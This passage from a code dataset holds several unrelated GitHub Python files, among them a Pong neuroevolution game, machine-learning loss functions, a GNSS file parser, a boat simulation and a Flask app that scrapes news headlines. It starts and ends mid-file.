response.json()\n\n survey_update_event = get_emitted_survey_update(survey_name, test_start_time)\n test_helper.assertEqual(survey_update_event['name'], survey_name,\n 'Unexpected survey name')\n\n test_helper.assertEqual(survey_update_event['sampleDefinitionUrl'], sample_definition_url,\n 'Unexpected sample definition URL')\n\n test_helper.assertEqual(survey_update_event['metadata'], {'foo': 'bar'},\n 'Unexpected metadata')\n\n return survey_id\n\n\ndef get_emitted_survey_update(expected_survey_name, test_start_time):\n # Build the matcher with the current expected survey name\n survey_name_matcher = partial(_survey_name_message_matcher, expected_survey_name=expected_survey_name)\n\n message_received = get_matching_pubsub_message_acking_others(Config.PUBSUB_OUTBOUND_SURVEY_SUBSCRIPTION,\n survey_name_matcher, test_start_time)\n\n return message_received['payload']['surveyUpdate']\n\n\ndef _survey_name_message_matcher(message: Mapping, expected_survey_name=None) -> (bool, str):\n if message['payload']['surveyUpdate']['name'] == expected_survey_name:\n return True, ''\n return False, f'Actual survey name \"{message[\"payload\"][\"surveyUpdate\"][\"name\"]}\" ' \\\n f'does not match expected \"{expected_survey_name}\"'\n","repo_name":"ONSdigital/ssdc-rm-acceptance-tests","sub_path":"acceptance_tests/utilities/survey_helper.py","file_name":"survey_helper.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22473868624","text":"import unittest\n\ndata = ((\"aA\", \"aAAbbbb\", 3), (\"z\", \"ZZ\", 0))\n\n\nclass Solution:\n def numJewelsInStones(self, jewels: str, stones: str) -> int:\n jewels_set = set(jewels)\n jewels_count = 0\n for s in stones:\n if s in jewels_set:\n jewels_count += 1\n return jewels_count\n\n\nclass TestCase(unittest.TestCase):\n def test_solution(self):\n s = Solution()\n\n for jewels, stones, expected in data:\n self.assertEqual(s.numJewelsInStones(jewels, stones), expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"cybernextgen/leetcode","sub_path":"easy/771-jewels-and-stones.py","file_name":"771-jewels-and-stones.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28147215907","text":"import numpy.random as nprand\nimport pygame\nfrom ball import Ball\nfrom paddle import Paddle\n\nclass Pong:\n def __init__(self):\n pygame.init()\n self.font = pygame.font.SysFont('Comic Sans MS', 30)\n self.screen = pygame.display.set_mode([1820, 980])\n self.screenWidth = self.screen.get_width()\n self.screenHeight = self.screen.get_height()\n\n self.simSpeed = 3\n\n self.population = []\n self.balls = []\n self.previousPopulation = []\n self.populationSize = 256\n self.averageFitnessHistory = []\n self.maximumScoreHistory = []\n self.maximumHitsHistory = []\n\n self.createPopulation()\n self.createBalls()\n self.generation = 1\n\n self.running = True\n self.drawAll = True\n self.gameLoop()\n pass\n\n def createPopulation(self):\n for i in range(self.populationSize):\n paddle = Paddle(self.screen)\n self.population.append(paddle)\n return self.population\n\n def createBalls(self):\n for i in range(self.populationSize):\n ball = Ball(self.screen, self.simSpeed)\n self.balls.append(ball)\n return self.balls\n\n def evaluateFitness(self):\n sumScore = 0\n sumHits = 0\n for paddle in self.previousPopulation:\n sumScore += paddle.timeUnderBall\n sumHits += 
paddle.ballHits\n for paddle in self.previousPopulation:\n paddle.fitness = ((paddle.timeUnderBall * paddle.ballHits) + (15000 / paddle.distanceFromBall)) ** 2\n pass\n\n def calculateStatistics(self):\n totalFitness = 0\n maximumScore = 0\n maximumHits = 0\n for paddle in self.previousPopulation:\n if paddle.timeUnderBall > maximumScore:\n maximumScore = paddle.timeUnderBall\n if paddle.ballHits > maximumHits:\n maximumHits = paddle.ballHits\n totalFitness += paddle.fitness\n self.averageFitnessHistory.append(totalFitness/len(self.previousPopulation))\n self.maximumScoreHistory.append(maximumScore)\n self.maximumHitsHistory.append(maximumHits)\n pass \n\n #build the next generation\n def nextGeneration(self):\n self.evaluateFitness()\n self.calculateStatistics()\n for i in range(self.populationSize):\n parent1 = self.selectRandomBiasedParent()\n parent2 = self.selectRandomBiasedParent()\n child = self.crossover(parent1, parent2, 1)\n \n # parent1 = self.selectFittestParent()\n # child = self.crossover(parent1, parent1, 1)\n if nprand.random() < 0.75:\n child.brain.mutate(0.1)\n self.population.append(child)\n self.createBalls()\n print(\"Average Fitness: \", self.averageFitnessHistory[-5:])\n print(\"Maximum Score: \", self.maximumScoreHistory[-5:])\n print(\"Maximum Hits: \", self.maximumHitsHistory[-5:])\n\n\n def selectRandomBiasedParent(self, k=3):\n\t# first random selection\n index = nprand.randint(len(self.previousPopulation))\n for i in nprand.randint(0, len(self.previousPopulation), k-1):\n # check if better (e.g. perform a tournament)\n if self.previousPopulation[i].fitness > self.previousPopulation[index].fitness:\n index = i\n return self.previousPopulation[index]\n\n def selectFittestParent(self):\n maxFitness = 0\n fittestPaddle = self.previousPopulation[0]\n for paddle in self.previousPopulation:\n if paddle.fitness > maxFitness:\n maxFitness = paddle.fitness\n fittestPaddle = paddle\n return fittestPaddle\n\n def crossover(self, parent1, parent2, crossoverRate):\n child = Paddle(self.screen)\n for layer in range(len(child.brain.layers)):\n for row in range(len(child.brain.layers[layer].weights)):\n for weight in range(len(child.brain.layers[layer].weights[row])):\n if nprand.random() < crossoverRate:\n child.brain.layers[layer].weights[row][weight] = parent1.brain.layers[layer].weights[row][weight]\n else:\n child.brain.layers[layer].weights[row][weight] = parent2.brain.layers[layer].weights[row][weight]\n return child\n\n def update(self):\n if len(self.population) <= 0:\n self.nextGeneration()\n self.generation += 1\n self.previousPopulation = []\n print(\"Generation: \", self.generation)\n else:\n toRemove = []\n for i in range(len(self.population)):\n paddle = self.population[i]\n ball = self.balls[i]\n if not ball.checkBallPos():\n self.previousPopulation.append(paddle)\n paddle.distanceFromBall = abs(ball.xPos - paddle.pos)\n toRemove.append(i)\n ball.updatePosition()\n paddle.collisionCheck(ball)\n prediction = paddle.think([[paddle.pos / self.screenWidth],[ball.xPos / self.screenWidth],[ball.yPos / self.screenHeight], [ball.xVel], [ball.yVel]])\n if prediction == 0:\n paddle.move(1)\n elif prediction == 2:\n paddle.move(-1)\n pass\n self.population = [paddle for paddle in self.population if self.population.index(paddle) not in toRemove]\n self.balls = [ball for ball in self.balls if self.balls.index(ball) not in toRemove]\n \n\n def draw(self):\n self.screen.fill((255,255,255))\n if (self.drawAll):\n for i in range(len(self.population)):\n 
self.population[i].draw()\n self.balls[i].draw()\n else:\n self.population[-1].draw()\n self.balls[-1].draw()\n pass\n\n def gameLoop(self):\n while self.running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_2:\n self.simSpeed = 5 if self.simSpeed >= 4.5 else self.simSpeed + 0.5\n print(self.simSpeed)\n for paddle in self.population:\n paddle.speed = self.simSpeed\n for ball in self.balls:\n ball.speed = self.simSpeed\n pass\n if event.key == pygame.K_1:\n self.simSpeed = 0 if self.simSpeed <= 0.5 else self.simSpeed - 0.5\n print(self.simSpeed)\n for paddle in self.population:\n paddle.speed = self.simSpeed\n for ball in self.balls:\n ball.speed = self.simSpeed\n if event.key == pygame.K_r:\n for ball in self.balls:\n self.balls = []\n for paddle in self.population:\n paddle.distanceFromBall = 500\n self.previousPopulation.append(paddle)\n self.population = []\n\n self.update()\n if (len(self.population) > 0):\n if (self.generation % 1 == 0):\n self.draw()\n pygame.display.flip()\n \n\n\ngame = Pong()","repo_name":"frankpeckover/pong","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":7582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34969470073","text":"import mubeaSlipSimulator as ms\nfrom datetime import datetime\nimport os\nimport plotext as plt\n\n\ndef monitorRuns(runs: int, d: ms.MeasurementStore, refresh_ms: int):\n labels = []\n velocities_f = []\n velocities_r = []\n delta = []\n\n values = d.getLast(runs)\n for v in values:\n id, data = v\n labels.append(datetime.strptime(data.get('date'), \"%Y-%m-%d %H:%M:%S.%f\"))\n velocities_f.append(float(data.get('velocity_f')))\n velocities_r.append(float(data.get('velocity_r')))\n\n d = float(data.get('velocity_f')) - float(data.get('velocity_r'))\n delta.append(d)\n\n title = 'Last Runs'\n os.system('cls' if os.name == 'nt' else 'clear')\n plt.clt()\n plt.clf()\n\n dates = plt.datetimes_to_string(labels)\n\n # Set the color of each line based on the velocity_f and velocity_r values\n line_color = \"red\" if velocities_f[-1] < velocities_r[-1] else \"blue\"\n plt.plot(delta, label=\"delta\", yside=\"right\", fillx=True, color=\"gray\")\n plt.plot(velocities_f, label=\"f\", yside=\"left\", color=line_color)\n plt.plot(velocities_r, label=\"r\", yside=\"left\", color=line_color)\n\n plt.interactive(True)\n plt.show()\n\n time.sleep(refresh_ms/1000)\n","repo_name":"Keijukainen311/SlipDetection","sub_path":"monitorTerminal.py","file_name":"monitorTerminal.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73521211529","text":"try:\r\n import cupy as np\r\n is_cupy_available = True\r\nexcept:\r\n import numpy as np\r\n is_cupy_available = False\r\n\r\nfrom diffusion.activations import Sigmoid, Softmax, ReLU, LogSoftmax\r\n\r\n\r\nclass MSE():\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.power(t - y, 2)\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -2 * (t - y) / np.prod(np.asarray(y.shape[1:]))\r\n\r\n\r\nclass BinaryCrossEntropy():\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -(t * np.log(y + 1e-8) + (1 - t) * np.log(1 - y + 1e-8))\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n 
return -t / (y + 1e-8) + (1 - t) / (1 - (y + 1e-8))\r\n\r\n\r\nclass CategoricalCrossEntropy():\r\n def __init__(self, ignore_index = None) -> None:\r\n self.ignore_index = ignore_index\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.where(t == self.ignore_index, 0, - t * np.log(y))\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.where(t == self.ignore_index, 0, -t / y)\r\n\r\n\r\nclass CrossEntropy():\r\n def __init__(self, ignore_index = None) -> None:\r\n self.ignore_index = ignore_index\r\n self.log_softmax = LogSoftmax()\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n log_softmax = self.log_softmax.forward(y)\r\n nll_loss = -log_softmax[np.arange(len(t)), t]\r\n \r\n return np.where(t == self.ignore_index, 0, nll_loss)\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n batch_size = y.shape[0]\r\n err = 1/batch_size\r\n nll_loss_der = -1 * np.where(np.isin(y, y[np.arange(len(t)), t]), err, 0).astype(y.dtype)\r\n \r\n output_err = self.log_softmax.jacobian_backward(nll_loss_der)\r\n \r\n return np.where(t.reshape(-1, 1) == self.ignore_index, 0, output_err)\r\n\r\n\r\n\r\n\r\n\r\n\r\nloss_functions = {\r\n \r\n \"mse\": MSE(),\r\n \"binary_crossentropy\": BinaryCrossEntropy(),\r\n \"categorical_crossentropy\": CategoricalCrossEntropy()\r\n\r\n}","repo_name":"AkiRusProd/numpy-diffusion","sub_path":"diffusion/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40979126630","text":"from sys import stdin\nfrom collections import defaultdict\nstdin = open(\"Greedy/input.txt\",'r')\ninput = stdin.readline\n\nn, k = map(int, input().strip().split())\nelect = list(map(int, input().strip().split()))\nresult = 0\n\nin_plug = defaultdict(int)\ns_idx = i = 0\n\nwhile sum(in_plug.values()) < n: # 플러그 개수만큼 우선 사용 차감 반영\n if not in_plug[elect[i]]: # 아직 플러그에 안 꽂은 제품이면\n in_plug[elect[i]] = 1 # 플러그에 사용중 표시\n # 이미 꽂혀있는 제품이면\n s_idx += 1\n i += 1\n if i == k-1:\n break\n\n\nfor i in range(s_idx, len(elect)):\n breaker = False\n if not in_plug[elect[i]]: # 아직 플러그에 안 꽂은 제품이면 무언가 뽑아야 함\n del in_plug[elect[i]]\n # 다음에 안 쓰는 제품이 꽂혀있으면 먼저 뽑는다.\n for e in in_plug.keys():\n if e not in elect[i+1:]:\n del in_plug[e]\n result += 1 \n in_plug[elect[i]] = 1\n now = i\n breaker = True\n break\n \n if not breaker:\n # 모두 다음에도 사용하는 제품이면,\n # 플러그에 꽂힌 제품들이 언제 사용되는지 보고,\n # 가장 나중에 사용될 제품을 뽑는다.\n candidates = {}\n while True:\n for e in in_plug.keys():\n for j in range(i, k):\n if e == elect[j]: # 중복값 들어오면 작은 값으로 넣는 과정 필요\n candidates[e] = [j, e]\n break\n break\n \n candidates = sorted(candidates.values(), key= lambda x: x[0], reverse=True)\n del in_plug[candidates[0][1]]\n result += 1\n in_plug[elect[i]] = 1 # 플러그에 사용중 표시\n \nprint(result)","repo_name":"Suyeon-B/week04_team","sub_path":"suyeon/Greedy/1700 멀티탭 스케줄링 reretry.py","file_name":"1700 멀티탭 스케줄링 reretry.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21873944922","text":"from .fitter import AutoCatFitter\nfrom .predictor import AutoCatPredictor\nfrom .file_io import DataReader\nfrom .scaler import Scaler\nfrom .defaults import BATCH_SIZE\nfrom .base import AutoCatTrain\nimport numpy as np\n\n\nclass AutoCat(object):\n def __init__(self, reference_lib=None):\n self.scaler = Scaler()\n 
self.metrics = {}\n self.data_r = \"\"\n self.data_len = 0\n self.batch_size = BATCH_SIZE\n self.reference_lib = reference_lib\n\n def fit(\n self, data, optimise_time=3600, weight=False\n ): # if file, expected to have header row\n smiles, targets = self.check_input(data)\n self.scaler.get_params(targets)\n training_params = AutoCatTrain().train_params(targets)\n\n if self.data_r == \"\" or self.data_len <= self.batch_size:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n )\n else:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n batch=True,\n data_r=self.data_r,\n batch_size=self.batch_size,\n data_len=self.data_len,\n )\n\n if weight:\n self.fitter.weight_labels(targets)\n\n if optimise_time > 0:\n self.fitter.optimise_search(smiles, targets, time_budget=optimise_time)\n\n self.metrics = self.fitter.fit(smiles, targets)\n return self.metrics\n\n def predict(self, data, smiles_col=0):\n if type(data) == np.ndarray:\n smiles = data\n elif type(data) == str:\n data_r = DataReader(data)\n smiles = data_r.read_smiles(smiles_col=smiles_col)\n\n if self.metrics != {}: # If there is a fitter trained in this AutoCat object\n self.predictor = AutoCatPredictor(features_file=self.reference_lib)\n self.predictor.set_model(self.fitter.get_model())\n\n return self.predictor.predict(smiles, self.scaler)\n\n def save(self, file_path, as_onnx=False):\n file_name = file_path.split(\".\")\n if as_onnx:\n if self.y.shape[1] > 1:\n raise Exception(\"Multiregression models cannot be saved in onnx format\")\n self.fitter.save_model(file_name[0] + \".onnx\", \"onnx\")\n else:\n self.fitter.save_model(file_name[0] + \".cbm\", \"cbm\")\n self.fitter.save_metrics(file_name[0] + \"_metrics.json\")\n self.fitter.save_weights(file_name[0] + \"_weights.json\")\n self.scaler.save(file_name[0] + \"_scaler.json\")\n\n def load(self, file_path):\n self.predictor = AutoCatPredictor(features_file=self.reference_lib)\n file_name = file_path.split(\".\")\n if file_name[-1] == \"onnx\":\n self.predictor.load_onnx(file_path)\n elif file_name[-1] == \"cbm\":\n self.predictor.load_cbm(file_path)\n self.scaler.load(file_name[0] + \"_scaler.json\")\n\n # TO DO save and load training params\n def retrain(self, model_path, data):\n file_name = model_path.split(\".\")\n self.scaler.load(file_name[0] + \"_scaler.json\")\n smiles, targets = self.check_input(data)\n training_params = AutoCatTrain().train_params(targets)\n\n if self.data_r == \"\" or self.data_len <= self.batch_size:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n )\n else:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n batch=True,\n data_r=self.data_r,\n batch_size=self.batch_size,\n data_len=self.data_len,\n )\n self.fitter.load_weights(file_name[0] + \"_weights.json\")\n\n self.metrics = self.fitter.fit(smiles, targets, retrain=model_path)\n return self.metrics\n\n def check_input(self, data):\n if type(data) == list:\n self.data_len = len(data[0])\n smiles = data[0]\n targets = data[1]\n\n elif type(data) == str:\n self.data_r = DataReader(data)\n self.data_len = self.data_r.read_length()\n if self.data_len <= self.batch_size:\n smiles, targets = self.data_r.get_fold(0, self.data_len)\n else:\n smiles, targets = self.data_r.get_fold(0, self.batch_size)\n if self.data_len % self.batch_size 
!= 0:\n print(\n \"Warning - training dataset is not a multiple of batch size:\",\n self.batch_size,\n )\n return smiles, targets\n","repo_name":"ersilia-os/autocat-chem","sub_path":"core/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"4986401896","text":"import tensorflow as tf\n\nfrom Caster.utils import shape_utils\n\n\nclass SequenceCrossEntropyLoss(object):\n \"\"\"\n 识别文本序列与标签文本序列的交叉熵损失\n \"\"\"\n def __init__(self,\n sequence_normalize=None,\n sample_normalize=None,\n weight=None):\n\n self._sequence_normalize = sequence_normalize\n self._sample_normalize = sample_normalize\n self._weight = weight\n\n \n def __call__(self, logits, labels, lengths, scope=None):\n \"\"\"\n Args:\n logits: float32 tensor with shape [batch_size, max_time, num_classes]\n labels: int32 tensor with shape [batch_size, max_time]\n lengths: int32 tensor with shape [batch_size]\n \n tf.nn.sparse_softmax_cross_entropy_with_logits:\n A common use case is to have logits and labels of shape [batch_size, num_classes], \n but higher dimensions are supported, in which case the dim-th dimension is assumed \n to be of size num_classes. logits and labels must have the same dtype (either float16, \n float32, or float64).\n \"\"\"\n with tf.name_scope(scope, 'SequenceCrossEntropyLoss', [logits, labels, lengths]):\n # 原始交叉熵损失\n raw_losses = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=labels, logits=logits\n )\n batch_size, max_time = shape_utils.combined_static_and_dynamic_shape(labels)\n \n # 计算指定序列长度以内的损失\n mask = tf.less(tf.tile([tf.range(max_time)],[batch_size,1]), tf.expand_dims(lengths,1), name='mask')\n masked_losses = tf.multiply(raw_losses, tf.cast(mask, tf.float32), name='masked_losses') # => [batch_size, max_time]\n row_losses = tf.reduce_sum(masked_losses, 1, name='row_losses') # 序列不同时刻损失值和 [batch_size]\n \n # 损失序列长度归一化\n if self._sequence_normalize:\n loss = tf.truediv(row_losses, tf.cast(tf.maximum(lengths),1),tf.float32, name='seq_normed_losses')\n \n loss = tf.reduce_sum(row_losses)\n \n # 损失batch归一化\n if self._sample_normalize:\n loss = tf.truediv(loss, tf.cast(tf.maximum(batch_size, 1),tf.float32))\n\n # 交叉熵损失权值\n if self._weight:\n loss = loss * self._weight\n return loss\n \n\n\nclass STNRegressionLoss(object):\n \"\"\"\n STN矫正定位网络回归损失(平方损失)\n \"\"\"\n def __init__(self, weight):\n self._weight = weight\n\n\n def __call__(self, prediction, target, scope=None):\n \"\"\"\n Args:\n prediction: float32 tensor with shape [batch_size, 2 * num_control_point]\n target: int32 tensor with shape [batch_size, 2 * num_control_point]\n \"\"\"\n with tf.name_scope(scope, 'STNRegressionLoss', [prediction, target]):\n diff = prediction - target\n losses = tf.reduce_sum(tf.square(diff), axis=1) # 2K维度计算损失和\n loss = tf.reduce_mean(losses, axis=0) # batch维度计算平均损失\n\n # 关键点回归损失权值\n if self._weight:\n loss = loss * self._weight\n return loss\n","repo_name":"ChenCongGit/Caster","sub_path":"model/model/Loss.py","file_name":"Loss.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"6355932004","text":"\n# Import modules.\nimport os\nimport time\nfrom datetime import date, timedelta\nfrom gnsscal import date2gpswd\nfrom Parsing.support_parsing_functions import parse_file\n\nfilesep = os.sep\n\nstart_time = time.time()\n\n\ndef parse_binary_file(binary_file, exe_dir, model):\n # Obtain 
directory to file.\n week_number, week_day_number = int(binary_file[:4]), int(binary_file[5])\n binary_dir = model.binary_dir + filesep + str(week_number) + filesep + binary_file\n\n # Determine if the file exists within binary_dir. Otherwise, return an error.\n if model.reduced:\n success, msg = parse_file(binary_dir, model.CSV_dir, exe_dir, model.PRNs_to_parse, week_number,\n week_day_number, time_range=model.set_time_range, start_time=model.time_start_value,\n end_time=model.time_end_value)\n if not success:\n return False, msg\n if model.raw:\n success, msg = parse_file(binary_dir, model.CSV_dir, exe_dir, model.PRNs_to_parse, week_number,\n week_day_number, reduced_or_raw='raw', time_range=model.set_time_range,\n start_time=model.time_start_value, end_time=model.time_end_value)\n if not success:\n return False, msg\n return True, 'Success'\n\n\n# ----------- PARSING (NovAtel receivers only) ------------ #\ndef run_parsing(model, exe_dir):\n # Process the dates. Obtain the names of the binary files.\n start_year, start_month, start_day = model.start_date\n end_year, end_month, end_day = model.end_date\n number_of_days = (date(end_year, end_month, end_day) - date(start_year, start_month, start_day)).days\n if number_of_days < 0:\n print('Error: The selected end date must be after the start date.')\n days = [date(start_year, start_month, start_day) + timedelta(days=i) for i in range(number_of_days + 1)]\n binary_files = [str(date2gpswd(day)[0]) + '_' + str(date2gpswd(day)[1]) + '_00_' + model.receiver_name + '.GPS' for\n day in days]\n\n # Parse the binary files.\n for binary_file in binary_files:\n\n # Parse file.\n success, error = parse_binary_file(binary_file, exe_dir, model)\n if not success:\n print(error)\n","repo_name":"nicolasgapa/EISA","sub_path":"EISA-master/Parsing/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"6412405868","text":"import pygame.display\nfrom math import sin, cos, radians, copysign\n\n\nclass Boat:\n def __init__(self, pos_x, pos_y):\n self.pos_x = pos_x\n self.pos_y = pos_y\n self.vel = 10\n self.heading = 90\n self.rudder = 0\n self.turn = 0\n\n self.length = 100\n self.width = 38\n\n self.boat_img = pygame.image.load('assets/boat_sprite.png')\n self.boat_img = pygame.transform.smoothscale(self.boat_img, (self.length, self.width))\n\n self.water_img_width = 450\n self.water_img_height = 450\n self.water_img = pygame.image.load('assets/water_sprite.jpg')\n self.water_img = pygame.transform.scale(self.water_img, (self.water_img_width, self.water_img_height))\n\n def update(self):\n self.heading = self.heading % 360\n\n max_rudder = 50\n max_vel = 40\n\n if self.rudder > max_rudder:\n self.rudder = max_rudder\n elif self.rudder < -max_rudder:\n self.rudder = -max_rudder\n\n if self.vel > max_vel:\n self.vel = max_vel\n elif self.vel < 0:\n self.vel = 0\n\n self.move()\n\n max_width = pygame.display.Info().current_w\n max_height = pygame.display.Info().current_h\n if self.pos_x > max_width:\n self.pos_x = 0\n if self.pos_x < 0:\n self.pos_x = max_width\n if self.pos_y > max_height:\n self.pos_y = 0\n if self.pos_y < 0:\n self.pos_y = max_height\n\n def move(self):\n self.turn += copysign(self.rudder ** 2, self.rudder) / 200\n\n if self.turn > 50:\n self.turn = 50\n elif self.turn < -50:\n self.turn = -50\n\n self.turn = self.turn * min((self.vel / 200 + 0.90), 0.95)\n\n if self.vel == 0:\n self.turn = 0\n\n self.heading += 
self.turn / ((self.vel + 10) * 4)\n self.turn = self.turn * 0.95\n\n self.pos_x = self.pos_x + self.vel * cos(radians(self.heading)) / 10\n self.pos_y = self.pos_y - self.vel * sin(radians(self.heading)) / 10\n","repo_name":"AleksanderZawisza/Fuzzy-Boat","sub_path":"app/boat.py","file_name":"boat.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23070263146","text":"import os\nfrom forms import InfoForm, AddTeaForm\n\nfrom flask import Flask, request, render_template, flash, session, redirect, url_for, session\n\nfrom wtforms.validators import DataRequired\nimport shutil\nimport requests\nfrom datetime import datetime\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom validate_email import validate_email\nimport csv\nimport re\nfrom bs4 import BeautifulSoup\nfrom flask_restful import Api,Resource\n\n\n# This grabs our directory\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\n# Key for Forms\napp.config['SECRET_KEY'] = 'mysecretkey'\n\n# Connects our Flask App to our Database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# create sqlite db \ndb = SQLAlchemy(app)\n# Add on migration capabilities in order to run terminal commands\nMigrate(app,db)\napi = Api(app)\n\n###################################\n# MODELS\n# it inherit from db.Model class\nclass User(db.Model):\n\n # The default table name will be the class name\n __tablename__ = 'User'\n\n ## CREATE THE COLUMNS FOR THE TABLE \n # Primary Key column, unique id for each user\n id = db.Column(db.Integer,primary_key=True)\n # Username\n username = db.Column(db.Text)\n # User email\n email = db.Column(db.Text)\n\n # This is a one-to-one relationship\n # A user can have only one fav type of tea\n tea = db.relationship('Tea',backref='user',uselist=False)\n\n # This sets what an instance in this table \n def __init__(self,username,email):\n self.username = username\n self.email = email\n\n def json(self):\n return {'username': self.username, 'email': self.email }\n\n def __repr__(self):\n if self.tea:\n # This is the string representation of a user in the model\n return f\"User {self.username}'s email' is {self.email}, user ID:{self.id}, his/her fav tea is {self.tea.tea_choice}\"\n else:\n return f\"User {self.username}'s email' is {self.email}, user ID:{self.id}, no tea yet.\"\n \n def report_tea(self):\n print(\"Here is my fav tea!\")\n print(self.tea) \n \n\nclass Tea(db.Model):\n\n # The default table name will be the class name\n __tablename__ = 'Tea'\n\n ## CREATE THE COLUMNS FOR THE TABLE \n # Primary Key column, unique id for each user\n id = db.Column(db.Integer,primary_key=True)\n # Username\n temperature = db.Column(db.Text)\n # User email\n tea_choice = db.Column(db.Text)\n\n # Connect the tea to the user that owns it.\n user_id = db.Column(db.Integer,db.ForeignKey('User.id'))\n\n # This sets what an instance in this table \n def __init__(self,temperature,tea_choice,user_id):\n self.temperature = temperature\n self.tea_choice = tea_choice\n self.user_id = user_id\n\n def json(self):\n return {'temperature': self.temperature, 'tea_choice': self.tea_choice, 'user_id': self.user_id,}\n\n def __repr__(self):\n # This is the string representation of a tea in the model\n if self.user_id:\n return f\"Tea {self.tea_choice}'s temperature is {self.temperature}, ID:{self.id}, 
user is {self.user_id}\"\n else:\n return f\"Tea {self.tea_choice}'s temperature is {self.temperature}, ID:{self.id}, no users yet\"\n\n\n\nproxies = {'http' : 'http://10.10.0.0:0000', \n 'https': 'http://120.10.0.0:0000'}\n\n# library to generate user agent\nfrom user_agent import generate_user_agent\n\nurl='https://www.nytimes.com/'\n\n# generate a user agent\nheaders = {'User-Agent': generate_user_agent(device_type=\"desktop\", os=('mac', 'linux'))}\n#headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.63 Safari/537.36'}\npage_response = requests.get(url, timeout=5, headers=headers)\n\n\n# website scraping\ntitles_list = []\n\n\ndef scraper():\n try:\n data = requests.get(url, timeout=5)\n if page_response.status_code == 200:\n\n html = BeautifulSoup(data.text, 'html.parser')\n\n titles = html.select('h2 span')\n\n try:\n for title in titles:\n titles_list.append(title.string)\n\n except IndexError:\n return 'No matching element found.' \n\n\n # write titles_list into csv file\n with open('index.csv', 'a') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow([titles_list, datetime.now()])\n else:\n print(page_response.status_code)\n # notify, try again\n except requests.Timeout as e:\n print(\"It is time to timeout\")\n print(str(e))\n return titles_list \n\nscraper()\n\n\n@app.route('/tea_form', methods=['GET', 'POST'])\ndef tea():\n # Create instance of the form.\n form = InfoForm()\n \n # Grab the data from the breed on the form.\n if form.validate_on_submit(): \n session['temperature'] = form.temperature.data\n session['tea_choice'] = form.tea_choice.data\n\n flash(f\"You just changed your tea_choice to: {session['tea_choice']}\")\n\n return redirect(url_for(\"thankyou\"))\n\n return render_template('tea.html', form=form)\n\n@app.route('/add_tea', methods=['GET', 'POST'])\ndef add_tea():\n # Create instance of the form.\n form = AddTeaForm()\n \n # Grab the data from the breed on the form.\n if form.validate_on_submit(): \n temperature = form.temperature.data\n tea_choice = form.tea_choice.data\n user_id = User.query.first().id\n \n # Add new tea to DB\n new_tea = Tea(temperature,tea_choice,user_id)\n db.session.add(new_tea)\n db.session.commit()\n\n\n return redirect(url_for(\"list_tea\"))\n\n return render_template('add_tea.html', form=form)\n\n@app.route('/userslist')\ndef list_user():\n # Grab a list of users from database.\n users = User.query.all()\n return render_template('userslist.html', users=users)\n\n@app.route('/tealist')\ndef list_tea():\n # Grab a list of tea from database.\n tea = Tea.query.all()\n return render_template('tealist.html', tea=tea)\n\n@app.route('/')\ndef index():\n return render_template('index.html',titles_list=titles_list)\n\n@app.route('/signup_form')\ndef signup_form():\n return render_template('signup_form.html')\n\n@app.route('/thankyou')\ndef thankyou():\n username = request.args.get('username')\n \n return render_template('thankyou.html',username=username)\n\n@app.route('/cn/<name>')\ndef cn(name):\n return 